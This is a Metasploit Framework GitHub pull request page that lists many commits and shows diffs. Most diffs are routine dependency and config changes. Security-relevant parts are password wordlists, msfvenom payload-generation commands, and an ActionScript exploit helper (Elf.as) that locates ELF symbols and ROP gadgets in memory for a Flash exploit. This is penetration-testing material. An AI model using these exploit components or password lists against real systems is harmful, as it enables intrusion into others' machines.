Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add butchered version of CVE-2015-1701 #5466

Merged
merged 271 commits into from
Jun 22, 2015
Merged

Add butchered version of CVE-2015-1701 #5466

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
271 commits
Select commit Hold shift + click to select a range
50b2ae4
Add a plugin for making curl-like http requests
zeroSteiner Mar 13, 2015
72650d7
Use an authorization header and fix uri.path
zeroSteiner Mar 13, 2015
2070934
Improve output file handling and expand_path
zeroSteiner Mar 13, 2015
59f40d7
Rename the requests plugin to http_requests
zeroSteiner Mar 13, 2015
2e8e350
Rename the http_requests plugin and command to httpr
zeroSteiner Mar 24, 2015
cefec81
move plugins/http to plugins/request
kernelsmith May 15, 2015
f1e48b9
genericizes http request plugin
kernelsmith May 27, 2015
7d896ba
removes a proxy vestige
kernelsmith May 27, 2015
b236187
restores proper -u usage
kernelsmith May 28, 2015
fa9a222
changes type handling to be fully automatic
kernelsmith May 29, 2015
a0bcbd1
Merge branch 'master' of github.com:rapid7/metasploit-framework
shuckins-r7 Jun 1, 2015
9d1a7ce
New modules to support 64bit process powershell.
benpturner Jun 1, 2015
d22dda2
Provide more context and references
jvazquez-r7 Jun 1, 2015
c3e1505
Update total_commander to use the new cred API
wchen-r7 Jun 2, 2015
b98cc89
Update filezilla_client_cred to use the new cred API
wchen-r7 Jun 2, 2015
1ae9265
Update tortoisesvn to use the new cred API
wchen-r7 Jun 2, 2015
b4cfe93
Add creds API
void-in Jun 2, 2015
7485cf7
Remove unnecessary spaces
void-in Jun 2, 2015
ac2a52b
fix android/java reverse_tcp
timwr Jun 2, 2015
b837741
Land #5454 : Fix android/java reverse_tcp
OJ Jun 2, 2015
27ddee4
Merge branch 'master' of github.com:rapid7/metasploit-framework
shuckins-r7 Jun 2, 2015
aac2db8
Remove comment about report_auth_info
wchen-r7 Jun 2, 2015
28556ea
Update spark_im to use the new cred API
wchen-r7 Jun 2, 2015
63708f2
Add module_fullname: fullname
wchen-r7 Jun 2, 2015
dddbf38
Updated payload spec to be in the correct order and updated payload c…
benpturner Jun 2, 2015
e431631
Add module_fullname: fullname,
wchen-r7 Jun 2, 2015
c64f025
Add module_fullname: fullname
wchen-r7 Jun 2, 2015
22a1b0a
Land #5399, latest recog and MDM
shuckins-r7 Jun 2, 2015
9713fe7
Updating to MDM 1.2.1
shuckins-r7 Jun 2, 2015
0313f0b
Check for a nil header value
zeroSteiner Jun 2, 2015
ef0d649
Update smartermail to use the new cred API
wchen-r7 Jun 3, 2015
b038760
Update razer_synapse to use the new cred API
wchen-r7 Jun 3, 2015
24ec3b2
Changed vprint_error to fail_with method.
espreto Jun 3, 2015
b305fa6
Changed vprint_error when nothing was downloaded.
espreto Jun 3, 2015
656f64d
Update razorsql to use the new cred API
wchen-r7 Jun 3, 2015
39d38f1
Update pptpd_chap_secrets to use the new cred API
wchen-r7 Jun 3, 2015
74117a7
Allow to execute payload from the flash renderer
jvazquez-r7 Jun 3, 2015
d3c3741
Use run_host so that we can use THREADS
jsherwood0 Jun 3, 2015
4ee0a14
Land #5477, speed improvements to snmp_login
Jun 4, 2015
a0aa613
Update ca_arcserve_rpc_authbypass to use the new cred API
wchen-r7 Jun 4, 2015
78e4677
Oops it blew up
wchen-r7 Jun 4, 2015
80cb70c
Add support for Windows 8.1/Firefox
jvazquez-r7 Jun 4, 2015
098f31c
Land support for Windows 8.1
jvazquez-r7 Jun 4, 2015
744baf2
Update kloxo_sqli to use the new cred API
wchen-r7 Jun 4, 2015
ab68d84
Add more targets
jvazquez-r7 Jun 4, 2015
75454f0
Update AS source code
jvazquez-r7 Jun 4, 2015
487cc15
Land #5476, multi-platform update for adobe_flash_net_connection_conf…
wchen-r7 Jun 4, 2015
7de78c1
Land #5447, more info about using the deprecated report_auth_info
wchen-r7 Jun 4, 2015
503f6a1
Land #4926, add request plugin for http(s)
kernelsmith Jun 4, 2015
23df66b
Land #5481, no powershell. exec shellcode from the renderer process.
wchen-r7 Jun 4, 2015
d4f418f
Style corrections
void-in Jun 4, 2015
06cc759
Use the correct help output for the ps command
Jun 4, 2015
346ea40
fix some alignment, add usage
Jun 4, 2015
26785b3
Land #5483 : Use the correct help output for the ps command
OJ Jun 4, 2015
874e090
Update wordpress_login_enum to use the new cred API
wchen-r7 Jun 4, 2015
02181ad
Update CVE-2014-0556
jvazquez-r7 Jun 4, 2015
51d98e1
Update AS code
jvazquez-r7 Jun 4, 2015
a53a68c
Refactor db_nmap and fix the save option
wvu Jun 4, 2015
c003602
Remove report_store_local from the spec
wvu Jun 4, 2015
b291d41
Quick hack to remove hard-coded offsets
OJ Jun 5, 2015
910ae8a
Fix #5461, actually stop a job from the RPC service
wchen-r7 Jun 5, 2015
935ed41
Land #5486, exec code from the renderer process instead of Powershell
wchen-r7 Jun 5, 2015
71a8487
Correct Flash version in the module description
wchen-r7 Jun 5, 2015
318f67f
update descriptions
jvazquez-r7 Jun 5, 2015
e151e38
Land #5489, @wchen-r7's flash exploit descriptions update
jvazquez-r7 Jun 5, 2015
15916f0
Backport an upstream fix for a nil header
wvu Jun 5, 2015
a3b61dc
Land #5488, fix job stopping from RPC service
Jun 5, 2015
bb9439e
land #5487, refactor and fix save function for db_nmap
Jun 5, 2015
0f4304c
Land #5494, handle short reads from mysql
Jun 5, 2015
57b7d10
Land #5449, @wchen-r7 updates total_commander to use the new cred API
jvazquez-r7 Jun 5, 2015
c3437da
Land #5451, @wchen-r7 Update filezilla_client_cred to use the new cre…
jvazquez-r7 Jun 5, 2015
f29b38b
Add the top 20 keyboard patterns as passwords
Jun 5, 2015
6b05302
Fixes #5459, refactors LoginScanner::SNMP
Jun 6, 2015
135958a
Cleanup the udp_(sweep|probe) SNMP generators
Jun 6, 2015
bf35b9b
Minor fix
jvazquez-r7 Jun 6, 2015
dca2607
Land #5452, @wchen-r7 Update tortoisesvn to use the new cred API
jvazquez-r7 Jun 6, 2015
cec20ec
Handle a rare corner case
Jun 6, 2015
fe09d98
Small rework of the spinners, clear the line when done
Jun 6, 2015
2942cb1
Land #5415, changes spaces in PSH shell output
Jun 6, 2015
df6722c
Land #5496, top 20 keyboard pattern passwords
wvu Jun 6, 2015
89e7dc6
Land #5499, polish dem spinners
wvu Jun 6, 2015
f761d41
Adjust line clearing to cover only the text
wvu Jun 6, 2015
d4ddc53
Fix #5499, small fix for line clearing
wvu Jun 6, 2015
bd36908
Fix #5500 by checking for session.respond_to?(:response_timeout)
Jun 6, 2015
93125a9
Land #5501, check method response_timeout before using
wchen-r7 Jun 7, 2015
a465104
Fix older Windows payloads to not require UUID
Jun 7, 2015
0557d21
Land #5503, fix a stack trace on legacy Windows payloads
Jun 7, 2015
537dc6e
Update Payload Cached Sizes fails in PSH Script
Jun 7, 2015
20b605e
Remove duplicate exec
benpturner Jun 7, 2015
1f11cd5
Lands #5446, support for 64-bit native powershell payloads
Jun 7, 2015
edcd1e3
Land #5504, handle cases where the script may be empty
Jun 7, 2015
25aa96c
Land #5456, removes obsolete comment
Jun 7, 2015
a39539f
Land #5457, @wchen-r7 updates spark_im to use the new cred API
jvazquez-r7 Jun 8, 2015
245c763
Update nessus_xmlrpc_logic to use the new creds API
void-in Jun 8, 2015
3279518
Move VMware modules to the VMware directory
void-in Jun 8, 2015
5a6a16c
Resolve #4326, remove msfpayload & msfencode. Use msfvenom instead!
wchen-r7 Jun 8, 2015
49e4820
Add depcrecated note to the existing modules
void-in Jun 9, 2015
b7f0fad
Modify CVE-2014-0569 to use the flash exploitation code
jvazquez-r7 Jun 9, 2015
39851d2
Unset debug flag
jvazquez-r7 Jun 9, 2015
5bab1cf
Fix indentation
jvazquez-r7 Jun 9, 2015
4f1ee3f
Really fix indentation
jvazquez-r7 Jun 9, 2015
5ab882a
Clean up module
wvu Jun 9, 2015
9c97da3
Land #5224, ProFTPD mod_copy exploit
wvu Jun 9, 2015
cc8650f
Fix TMPPATH description
wvu Jun 9, 2015
d31a59c
Fix #5224, altered option description
wvu Jun 9, 2015
8a69704
Fix up commas
wvu Jun 9, 2015
9fa4234
Fix #5224, comma fixes
wvu Jun 9, 2015
f4649cb
Delete old AS
jvazquez-r7 Jun 9, 2015
cf8c6b5
Debug version working
jvazquez-r7 Jun 9, 2015
d9db456
Delete debug messages
jvazquez-r7 Jun 9, 2015
e5d6c9a
Make last code cleanup
jvazquez-r7 Jun 9, 2015
7c91aee
Dont use a "connected" to keep compat with BSD
Jun 10, 2015
3fe6ddd
Change credential status from untried to successful
void-in Jun 10, 2015
3ffe006
Update titan_ftp_admin_pwd to use the new creds API
void-in Jun 10, 2015
7cb82f5
Add ftp port for service
void-in Jun 10, 2015
d95a0f4
Update AS codE
jvazquez-r7 Jun 10, 2015
64b486e
Change filename
jvazquez-r7 Jun 10, 2015
a6fe383
Use AS Exploiter
jvazquez-r7 Jun 10, 2015
fb531d0
Update version coverage
jvazquez-r7 Jun 10, 2015
2b4fe96
Tweak Heap Spray
jvazquez-r7 Jun 10, 2015
0d979f6
Minor fixups on newish modules
Jun 10, 2015
dc2fec7
Land #5509, remove msfencode and msfpayload
Jun 10, 2015
b23647d
Land #5521, @todb-r7's module cleanup
wvu Jun 10, 2015
667db8b
Land #5517, adobe_flash_casi32_int_overflow (exec from the flash rend…
wchen-r7 Jun 10, 2015
d622c78
Land #5519, adobe_flash_uncompress_zlib_uninitialized in the flash re…
wchen-r7 Jun 10, 2015
ecbddc6
Play with memory al little bit better
jvazquez-r7 Jun 10, 2015
8dad739
Land #5508, Get Ready to Move VMware modules to the VMware directory
wchen-r7 Jun 10, 2015
7fba64e
Allow more search space
jvazquez-r7 Jun 10, 2015
0d2454d
Fix indentation
jvazquez-r7 Jun 10, 2015
6c7ee10
Update to use the new flash Exploiter
jvazquez-r7 Jun 10, 2015
ab13229
Add Exploiter AS
jvazquez-r7 Jun 10, 2015
7527aa4
Disable debug
jvazquez-r7 Jun 10, 2015
7202e27
Fix indentation
jvazquez-r7 Jun 10, 2015
1d05ce1
Fix for indentation
jvazquez-r7 Jun 10, 2015
2bb3a50
Fix else indentation
jvazquez-r7 Jun 10, 2015
6456256
Fix method indentation
jvazquez-r7 Jun 10, 2015
af31112
Fix exploit indentation
jvazquez-r7 Jun 10, 2015
4c5b1fb
Land #5522, adobe_flash_worker_byte_array_uaf in the flash renderer
wchen-r7 Jun 10, 2015
ae21b0c
Land #5523, adobe_flash_domain_memory_uaf in the flash renderer
wchen-r7 Jun 10, 2015
8ed13b1
Add linux support for CVE-2014-0515
jvazquez-r7 Jun 11, 2015
72672fc
Delete debug
jvazquez-r7 Jun 11, 2015
8f4a44a
Land #5474, @wchen-r7 Updates pptpd_chap_secrets to use the new cred API
jvazquez-r7 Jun 12, 2015
20170bd
Report as hash
wchen-r7 Jun 12, 2015
7baebee
Update MDM dependency
trevrosen Jun 12, 2015
89d03a1
Symbol to String
wchen-r7 Jun 12, 2015
f279c6c
Land #5252, @espreto's module for WordPress Front-end Editor File Upl…
jvazquez-r7 Jun 12, 2015
a53ca53
Fix inconstancy - multi/handler
g0tmi1k Jun 12, 2015
184c20c
Do minor cleanup
jvazquez-r7 Jun 12, 2015
e628d71
Land #5397, @espreto's module for WordPress Simple Backup File Read V…
jvazquez-r7 Jun 12, 2015
6dcc9b7
More inconsistencies
g0tmi1k Jun 12, 2015
0f230ce
Land #5526
shuckins-r7 Jun 12, 2015
9dde32f
Updating to MDM 1.2.3
shuckins-r7 Jun 12, 2015
7f0e334
Added Windows 2003 SP1 & SP2 French targets
omarix Jun 13, 2015
c7cda25
Empty lines removed at line 624 and line 721.
omarix Jun 13, 2015
ab6f3a7
Fix #5531, the ```stage_payload``` method does not take arguments.
Jun 13, 2015
77f506c
Land #5532 : Fix #5531, the stage_payload method does not take arguments
OJ Jun 13, 2015
17b8ddc
Land #5524, adobe_flash_pixel_bender_bof in flash renderer
wchen-r7 Jun 15, 2015
c20cf15
Msut have last_attempted_at key
wchen-r7 Jun 15, 2015
ebce415
Land #5507, Update nessus_xmlrpc_logic to use the new creds API
wchen-r7 Jun 15, 2015
308b1a3
Don't deregister username & password
wchen-r7 Jun 15, 2015
940d045
Correctly report rport
wchen-r7 Jun 15, 2015
907f596
Land #5520, Update titan_ftp_admin_pwd to use the new creds API
wchen-r7 Jun 15, 2015
8d640a0
Land #5527, multi/handler -> exploit/multi/handler
wvu Jun 15, 2015
80f1173
Style and scanner usability cleanup for ssh_version
jhart-r7 Jun 15, 2015
feb7263
Wire in recog support for ssh_version
jhart-r7 Jun 15, 2015
079a9d4
Use peer
jhart-r7 Jun 15, 2015
5ac97d1
Lands #5538, adds Recog to ssh_version
Jun 15, 2015
0b88e86
Using the new cred API for multiple auxiliary modules
wchen-r7 Jun 15, 2015
eb39eaa
Add support to decryption v2
jvazquez-r7 Jun 16, 2015
c06e16f
Merge pull request #30 from jvazquez-r7/review_5468
wchen-r7 Jun 16, 2015
b6379b4
Update drupal_views_user_enum
wchen-r7 Jun 16, 2015
2778274
Added new SSL Labs API fields and fixed minor errors
dnkolegov Jun 16, 2015
c3d2797
Fixed Info fields
dnkolegov Jun 16, 2015
fcf6212
Update telnet capture module to use the new creds API
void-in Jun 16, 2015
9dbdaf1
Add AutoVerifySessionTimeout Meterpreter advanced option
OJ Jun 16, 2015
67065e1
Update database.yml.example to ref MSF-DEV
Jun 16, 2015
11bf416
Land #5548, database.yml.example MSF-DEV ref
wvu Jun 16, 2015
3410782
Capitalized 'Accepted'
g0tmi1k Jun 16, 2015
4fee6b2
Land #5549, OptEnum "accepted" capitalization
wvu Jun 16, 2015
33139c4
shell_to_meterpreter minor improvements
g0tmi1k Jun 16, 2015
ef825fb
Land #5530, shell_to_meterpreter improvements
wvu Jun 16, 2015
f5b9be7
Land #5468, @wchen-r7's updates razorsql to use the new creds api
jvazquez-r7 Jun 16, 2015
f2e2af1
Remove msfencode from the gemspec
wvu Jun 16, 2015
b40e9f6
util/exe - replace tabs with spaces
g0tmi1k Jun 17, 2015
37546c7
to_exe_vbs - Allow for exe_filename to be defined
g0tmi1k Jun 17, 2015
dc07938
Land #5550, custom exe_filename for to_exe_vba
wvu Jun 17, 2015
0f2897d
Land #5551, Remove msfencode from the gemspec
wchen-r7 Jun 17, 2015
772a5dd
Created array and added support for version 4
Th3R3p0 Jun 17, 2015
e30b0e0
forced client to version 3 for servers and added comments. This adds …
Th3R3p0 Jun 17, 2015
a6c7f93
changed text to show support for RFB version 4.001
Th3R3p0 Jun 17, 2015
8ea0953
removed a debugging line
Th3R3p0 Jun 17, 2015
ce9481d
Inconstancy - If datastore['VERBOSE'] vs vprint
g0tmi1k Jun 18, 2015
de1542e
Add module for CVE-2015-3090
jvazquez-r7 Jun 18, 2015
55f077f
Fix indentation
jvazquez-r7 Jun 18, 2015
27a5838
Fix one more line indentation
jvazquez-r7 Jun 18, 2015
13a3f27
Change ExcellentRanking to GoodRanking for MS14-064
wchen-r7 Jun 18, 2015
afcb016
Minor description fixups.
Jun 18, 2015
15f0cf4
Land #5561, @todb-r7's release fixes
wvu Jun 18, 2015
308cad8
Fix #5565, Fix os.js service pack detection
wchen-r7 Jun 18, 2015
9b5770c
Change to Metasploit::Model::Login::Status::SUCCESSFUL
wchen-r7 Jun 19, 2015
fb9ad66
Change to Metasploit::Model::Login::Status::SUCCESSFUL
wchen-r7 Jun 19, 2015
7e91121
Change to Metasploit::Model::Login::Status::SUCCESSFUL
wchen-r7 Jun 19, 2015
fc14178
Support hash format
wchen-r7 Jun 19, 2015
fc35a53
Pass options correctly
wchen-r7 Jun 19, 2015
76cd959
Fix author
aushack Jun 19, 2015
0d7ef6f
Pass username as symbol
jvazquez-r7 Jun 19, 2015
80f6e90
Land #5463, @wchen-r7 updates smartermail to use the new cred API
jvazquez-r7 Jun 19, 2015
6d2b7e0
Use downcase
jvazquez-r7 Jun 19, 2015
b349549
Land #5464, @wchen-r7 Updates razer_synapse to use the new cred API
jvazquez-r7 Jun 19, 2015
357a392
Trying to report more accurate status
jvazquez-r7 Jun 19, 2015
0f17f62
Report last_attempted_at
jvazquez-r7 Jun 19, 2015
1c357e6
Land #5478, @wchen-r7 Updates ca_arcserve_rpc_authbypass to use the n…
jvazquez-r7 Jun 19, 2015
c2f0973
Report attempt_time
jvazquez-r7 Jun 19, 2015
c95b3bb
Land #5479, @wchen-r7 Updates kloxo_sqli to use the new cred API
jvazquez-r7 Jun 19, 2015
15985e8
Land #5559, Adobe Flash Player ShaderJob Buffer Overflow
wchen-r7 Jun 19, 2015
d86c21e
Land #5567, author fix
wvu Jun 19, 2015
7f56b46
Land #5546, Use the new cred API for auxiliary/server/capture/telnet
wchen-r7 Jun 19, 2015
dfae4bb
Do reporting more accurate
jvazquez-r7 Jun 19, 2015
ebd376e
Land #5485, @wchen-r7 updates wordpress_login_enum to use the new cre…
jvazquez-r7 Jun 19, 2015
d116f1e
Land #5566, @wchen-r7 fixes #5565 modifying os.js
jvazquez-r7 Jun 19, 2015
6ec8488
Land #5560, @wchen-r7 Changes ExcellentRanking to GoodRanking for MS1…
jvazquez-r7 Jun 19, 2015
b994801
Revert auto tab replacement
wvu Jun 19, 2015
2587595
Land #5556, vprint_status fix
wvu Jun 19, 2015
5a548c3
Land #5453, Update dbvis_enum to use the new cred API
wchen-r7 Jun 19, 2015
5a27738
remove some trailing commas
Jun 19, 2015
bf170a1
the API sometimes returns negative percents - treat these as 0
Jun 19, 2015
d19c2e7
Land #5544, track updates to SSL Labs API
Jun 19, 2015
34ece37
First off, iconv is gone, and zlib is stdlib
Jun 19, 2015
afe5bb5
Get rid of the fall through methods
Jun 19, 2015
a004c72
Get rid of the encode test and iconv fallback
Jun 19, 2015
01e3738
Add some YARD docs to the ebcdic methods
Jun 19, 2015
66fecb2
Add some specs around changed methods
Jun 19, 2015
7eeb880
Do minor code cleanup
jvazquez-r7 Jun 19, 2015
d672ac1
Correct service name for mssql for scanner detection
gmikeska-r7 Jun 19, 2015
34d5d92
Land #5555, @Th3R3p0's support for for RFB Version 4
jvazquez-r7 Jun 19, 2015
bd097e3
Land #5497, Refactor LoginScanner::SNMP to be fast and less buggy
wchen-r7 Jun 19, 2015
b104155
Do Metasploit::Model::Login::Status::UNTRIED
wchen-r7 Jun 19, 2015
ef286fd
Remove report_auth_info
wchen-r7 Jun 19, 2015
8342758
report_note for group info
wchen-r7 Jun 19, 2015
0b0cc36
Land #5569, Correct service name for mssql for scanner detection
wchen-r7 Jun 19, 2015
252b573
Land #5547, configurable auto session timeout
Jun 19, 2015
b580f93
New password from Snowden
Jun 19, 2015
fa6e459
Provide context to the note
jvazquez-r7 Jun 19, 2015
4762e9f
Land #5540, @wchen-r7's changes for multiple auxiliary modules to use…
jvazquez-r7 Jun 19, 2015
61ad4ad
Delete commas
jvazquez-r7 Jun 19, 2015
74bc9f7
Land #5529, @omarix's Windows 2003 SP1 & SP2 French targets for MS08-067
jvazquez-r7 Jun 19, 2015
04901ba
Land #5572 @todb-r7's adds snowden's password to unix_passwords.txt
jvazquez-r7 Jun 19, 2015
bf7e069
Land #5570, @todb-r7 Removes references to Iconv gem, since it's depr…
jvazquez-r7 Jun 19, 2015
b78ba55
Merge minor CVE-2015-1701 from zeroSteiner
OJ Jun 21, 2015
3686acc
Merge branch 'upstream/master' into cve-2015-1701
OJ Jun 21, 2015
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Jump to
Jump to file
Failed to load files.
Diff view
Diff view
14 changes: 7 additions & 7 deletions Gemfile.lock
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -15,7 +15,7 @@ PATH
packetfu (= 1.1.9)
railties
rb-readline-r7
recog (~> 1.0)
recog (~> 2.0)
robots
rubyzip (~> 1.1)
sqlite3
Expand All @@ -24,7 +24,7 @@ PATH
activerecord (>= 4.0.9, < 4.1.0)
metasploit-credential (~> 1.0)
metasploit-framework (= 4.11.0.pre.dev)
metasploit_data_models (~> 1.0)
metasploit_data_models (~> 1.2)
pg (>= 0.11)
metasploit-framework-pcap (4.11.0.pre.dev)
metasploit-framework (= 4.11.0.pre.dev)
Expand Down Expand Up @@ -124,7 +124,7 @@ GEM
activesupport (>= 4.0.9, < 4.1.0)
railties (>= 4.0.9, < 4.1.0)
metasploit-payloads (1.0.2)
metasploit_data_models (1.1.0)
metasploit_data_models (1.2.3)
activerecord (>= 4.0.9, < 4.1.0)
activesupport (>= 4.0.9, < 4.1.0)
arel-helpers
Expand All @@ -133,13 +133,13 @@ GEM
pg
postgres_ext
railties (>= 4.0.9, < 4.1.0)
recog (~> 1.0)
recog (~> 2.0)
method_source (0.8.2)
mime-types (2.4.3)
mini_portile (0.6.2)
minitest (4.7.5)
msgpack (0.5.11)
multi_json (1.11.0)
msgpack (0.6.0)
multi_json (1.11.1)
multi_test (0.1.2)
network_interface (0.0.1)
nokogiri (1.6.6.2)
Expand Down Expand Up @@ -174,7 +174,7 @@ GEM
thor (>= 0.18.1, < 2.0)
rake (10.4.2)
rb-readline-r7 (0.5.2.0)
recog (1.0.29)
recog (2.0.5)
nokogiri
redcarpet (3.2.3)
rkelly-remix (0.0.6)
Expand Down
3 changes: 1 addition & 2 deletions config/database.yml.example
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -3,8 +3,7 @@
# these days. (No SQLite, no MySQL).
#
# To set up a metasploit database, follow the directions hosted at:
# https://fedoraproject.org/wiki/Metasploit_Postgres_Setup (Works on
# essentially any Linux distro, not just Fedora)
# http://r-7.co/MSF-DEV#set-up-postgresql
development: &pgsql
adapter: postgresql
database: metasploit_framework_development
Expand Down
Binary file removed data/exploits/CVE-2014-0515/Graph.swf
View file
Open in desktop
Binary file not shown.
Binary file added data/exploits/CVE-2014-0515/msf.swf
View file
Open in desktop
Binary file not shown.
Binary file modified data/exploits/CVE-2014-0556/msf.swf
100755 → 100644
View file
Open in desktop
Binary file not shown.
Binary file modified data/exploits/CVE-2014-0569/msf.swf
View file
Open in desktop
Binary file not shown.
Binary file modified data/exploits/CVE-2014-8440/msf.swf
View file
Open in desktop
Binary file not shown.
Binary file modified data/exploits/CVE-2015-0311/msf.swf
View file
Open in desktop
Binary file not shown.
Binary file modified data/exploits/CVE-2015-0313/msf.swf
100755 → 100644
View file
Open in desktop
Binary file not shown.
Binary file modified data/exploits/CVE-2015-0336/msf.swf
View file
Open in desktop
Binary file not shown.
Binary file modified data/exploits/CVE-2015-0336/trigger.swf
View file
Open in desktop
Binary file not shown.
Binary file modified data/exploits/CVE-2015-0359/msf.swf
View file
Open in desktop
Binary file not shown.
Binary file modified data/exploits/CVE-2015-1701/cve-2015-1701.x64.dll
View file
Open in desktop
Binary file not shown.
Binary file modified data/exploits/CVE-2015-1701/cve-2015-1701.x86.dll
View file
Open in desktop
Binary file not shown.
Binary file added data/exploits/CVE-2015-3090/msf.swf
View file
Open in desktop
Binary file not shown.
2 changes: 1 addition & 1 deletion data/js/detect/os.js
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -1027,7 +1027,7 @@ os_detect.getVersion = function(){
}
switch (navigator.appMinorVersion){
case ";SP2;":
ua_version += ";SP2";
os_sp = "SP2";
break;
}
}
Expand Down
20 changes: 20 additions & 0 deletions data/wordlists/keyboard-patterns.txt
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,20 @@
qwerty
qwertyuiop
1qaz2wsx
qazwsx
asdfgh
zxcvbnm
1234qwer
q1w2e3r4t5
qwer1234
q1w2e3r4
asdfasdf
qazwsxedc
asdfghjkl
q1w2e3
1qazxsw2
12QWaszx
qweasdzxc
mnbvcxz
a1b2c3d4
adgjmptw
3 changes: 2 additions & 1 deletion data/wordlists/unix_passwords.txt
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -1002,4 +1002,5 @@ sq!us3r
adminpasswd
raspberry
74k&^*nh#$
arcsight
arcsight
MargaretThatcheris110%SEXY
10 changes: 5 additions & 5 deletions external/source/DLLHijackAuditKit/regenerate_binaries.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -2,12 +2,12 @@

dllbase = File.expand_path(File.dirname(__FILE__))
msfbase = File.expand_path(File.join(dllbase, "..", "..", ".."))
msfp = File.join(msfbase, "msfpayload")
msfv = File.join(msfbase, "msfvenom")

Dir.chdir(dllbase)

system("ruby #{msfp} windows/exec CMD=calc.exe X > runcalc.exe")
system("ruby #{msfp} windows/exec CMD=calc.exe D > runcalc.dll")
system("ruby #{msfp} windows/exec CMD='cmd.exe /c echo yes > exploited.txt' D > runtest.dll")
system("ruby #{msfp} windows/exec CMD='cmd.exe /c echo yes > exploited.txt' X > runtest.exe")
system("ruby #{msfv} -p windows/exec CMD=calc.exe -f exe -o runcalc.exe")
system("ruby #{msfv} -p windows/exec CMD=calc.exe -f dll -o runcalc.dll")
system("ruby #{msfv} -p windows/exec CMD='cmd.exe /c echo yes > exploited.txt' -f dll -o runtest.dll")
system("ruby #{msfv} -p windows/exec CMD='cmd.exe /c echo yes > exploited.txt' -f exe -o runtest.exe")

235 changes: 235 additions & 0 deletions external/source/exploits/CVE-2014-0515/Elf.as
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,235 @@
package
{
public class Elf
{
private const PT_DYNAMIC:uint = 2
private const PT_LOAD:uint = 1
private const PT_READ_EXEC:uint = 5
private const DT_SYMTAB:uint = 6
private const DT_STRTAB:uint = 5
private const DT_PLTGOT:uint = 3

private var e_ba:ExploitByteArray
// elf base address
public var base:uint = 0
// program header address
public var ph:uint = 0
// number of program headers
public var ph_size:uint = 0
// program header entry size
public var ph_esize:uint = 0
// DYNAMIC segment address
public var seg_dynamic:uint = 0
// DYNAMIC segment size
public var seg_dynamic_size:uint = 0
// CODE segment address
public var seg_exec:uint = 0
// CODE segment size
public var seg_exec_size:uint = 0
// .dynsyn section address
public var sec_dynsym:uint = 0
// .synstr section address
public var sec_dynstr:uint = 0
// .got.plt section address
public var sec_got_plt:uint = 0

public function Elf(ba:ExploitByteArray, addr:uint)
{
e_ba = ba
set_base(addr)
set_program_header()
set_program_header_size()
set_program_header_entry_size()
set_dynamic_segment()
set_exec_segment()
set_dynsym()
set_dynstr()
set_got_plt()
}

public function external_symbol(name:String):uint {
var entry:uint = 0
var st_name:uint = 0
var st_value:uint = 0
var st_size:uint = 0
var st_info:uint = 0
var st_other:uint = 0
var st_shndx:uint = 0
var st_string:String = ""
var got_plt_index:uint = 0

for(var i:uint = 0; i < 1000; i++) { // 1000 is just a limit
entry = sec_dynsym + 0x10 + (i * 0x10)
st_name = e_ba.read(entry)
st_value = e_ba.read(entry + 4)
st_info = e_ba.read(entry + 0xc, "byte")
st_string = e_ba.read_string(sec_dynstr + st_name)
if (st_string == name) {
return e_ba.read(sec_got_plt + 0xc + (got_plt_index * 4))
}
if (st_info != 0x11) {
got_plt_index++
}
}
throw new Error()
}

public function symbol(name:String):uint {
var entry:uint = 0
var st_name:uint = 0
var st_value:uint = 0
var st_size:uint = 0
var st_info:uint = 0
var st_other:uint = 0
var st_shndx:uint = 0
var st_string:String = ""

for(var i:uint = 0; i < 3000; i++) { // 3000 is just a limit
entry = sec_dynsym + 0x10 + (i * 0x10)
st_name = e_ba.read(entry)
st_value = e_ba.read(entry + 4)
st_info = e_ba.read(entry + 0xc, "byte")
st_string = e_ba.read_string(sec_dynstr + st_name)
if (st_string == name) {
return base + st_value
}
}
throw new Error()
}


public function gadget(gadget:String, hint:uint):uint
{
var value:uint = parseInt(gadget, 16)
var contents:uint = 0
for (var i:uint = 0; i < seg_exec_size - 4; i++) {
contents = e_ba.read(seg_exec + i)
if (hint == 0xffffffff && value == contents) {
return seg_exec + i
}
if (hint != 0xffffffff && value == (contents & hint)) {
return seg_exec + i
}
}
throw new Error()
}

private function set_base(addr:uint):void
{
addr &= 0xffff0000
while (true) {
if (e_ba.read(addr) == 0x464c457f) {
base = addr
return
}
addr -= 0x1000
}

throw new Error()
}

private function set_program_header():void
{
ph = base + e_ba.read(base + 0x1c)
}

private function set_program_header_size():void
{
ph_size = e_ba.read(base + 0x2c, "word")
}

private function set_program_header_entry_size():void
{
ph_esize = e_ba.read(base + 0x2a, "word")
}

private function set_dynamic_segment():void
{
var entry:uint = 0
var p_type:uint = 0

for (var i:uint = 0; i < ph_size; i++) {
entry = ph + (i * ph_esize)
p_type = e_ba.read(entry)
if (p_type == PT_DYNAMIC) {
seg_dynamic = base + e_ba.read(entry + 8)
seg_dynamic_size = e_ba.read(entry + 0x14)
return
}
}

throw new Error()
}

private function set_exec_segment():void
{
var entry:uint = 0
var p_type:uint = 0
var p_flags:uint = 0

for (var i:uint = 0; i < ph_size; i++) {
entry = ph + (i * ph_esize)
p_type = e_ba.read(entry)
p_flags = e_ba.read(entry + 0x18)
if (p_type == PT_LOAD && (p_flags & PT_READ_EXEC) == PT_READ_EXEC) {
seg_exec = base + e_ba.read(entry + 8)
seg_exec_size = e_ba.read(entry + 0x14)
return
}
}

throw new Error()
}

private function set_dynsym():void
{
var entry:uint = 0
var s_type:uint = 0

for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
entry = seg_dynamic + i
s_type = e_ba.read(entry)
if (s_type == DT_SYMTAB) {
sec_dynsym = e_ba.read(entry + 4)
return
}
}

throw new Error()
}

private function set_dynstr():void
{
var entry:uint = 0
var s_type:uint = 0

for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
entry = seg_dynamic + i
s_type = e_ba.read(entry)
if (s_type == DT_STRTAB) {
sec_dynstr = e_ba.read(entry + 4)
return
}
}

throw new Error()
}

